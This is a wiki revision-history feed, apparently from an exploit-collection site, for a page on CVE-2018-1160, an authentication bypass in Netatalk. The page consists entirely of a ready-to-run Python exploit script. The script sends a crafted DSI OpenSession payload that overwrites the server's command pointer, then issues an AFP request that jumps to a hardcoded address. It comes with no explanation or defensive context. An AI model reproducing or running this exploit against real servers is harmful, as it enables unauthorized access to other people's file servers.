https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-1160_Netatalk_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E
CVE-2018-1160 Netatalk 身份驗證繞過漏洞 - Revision history
2026-04-15T02:45:35Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2018-1160_Netatalk_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=1501&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> import socket import struct import sys if len(sys.argv) != 3: sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) sock = socket.socket(socket.AF_INET, socke..."
2021-04-11T01:16:16Z
<p>Created page with "==EXP== <pre> import socket import struct import sys if len(sys.argv) != 3: sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) sock = socket.socket(socket.AF_INET, socke..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
import socket<br />
import struct<br />
import sys<br />
if len(sys.argv) != 3:<br />
sys.exit(0)<br />
ip = sys.argv[1]<br />
port = int(sys.argv[2])<br />
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]<br />
sock.connect((ip, port))<br />
dsi_payload = "\x00\x00\x40\x00" # client quantum<br />
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize<br />
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum<br />
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids<br />
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr<br />
dsi_opensession = "\x01" # attention quantum option<br />
dsi_opensession += struct.pack("B", len(dsi_payload)) # length<br />
dsi_opensession += dsi_payload<br />
dsi_header = "\x00" # "request" flag<br />
dsi_header += "\x04" # open session command<br />
dsi_header += "\x00\x01" # request id<br />
dsi_header += "\x00\x00\x00\x00" # data offset<br />
dsi_header += struct.pack(">I", len(dsi_opensession))<br />
dsi_header += "\x00\x00\x00\x00" # reserved<br />
dsi_header += dsi_opensession<br />
sock.sendall(dsi_header)<br />
resp = sock.recv(1024)<br />
print "[+] Open Session complete"<br />
afp_command = "\x01" # invoke the second entry in the table<br />
afp_command += "\x00" # protocol defined padding<br />
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry<br />
afp_command += struct.pack("Q", 0x4295f0) # address to jump to<br />
dsi_header = "\x00" # "request" flag<br />
dsi_header += "\x02" # "AFP" command<br />
dsi_header += "\x00\x02" # request id<br />
dsi_header += "\x00\x00\x00\x00" # data offset<br />
dsi_header += struct.pack(">I", len(afp_command))<br />
dsi_header += '\x00\x00\x00\x00' # reserved<br />
dsi_header += afp_command<br />
print "[+] Sending get server info request"<br />
sock.sendall(dsi_header)<br />
resp = sock.recv(1024)<br />
print resp<br />
print "[+] Fin."<br />
<br />
</pre></div>
Pwnwiki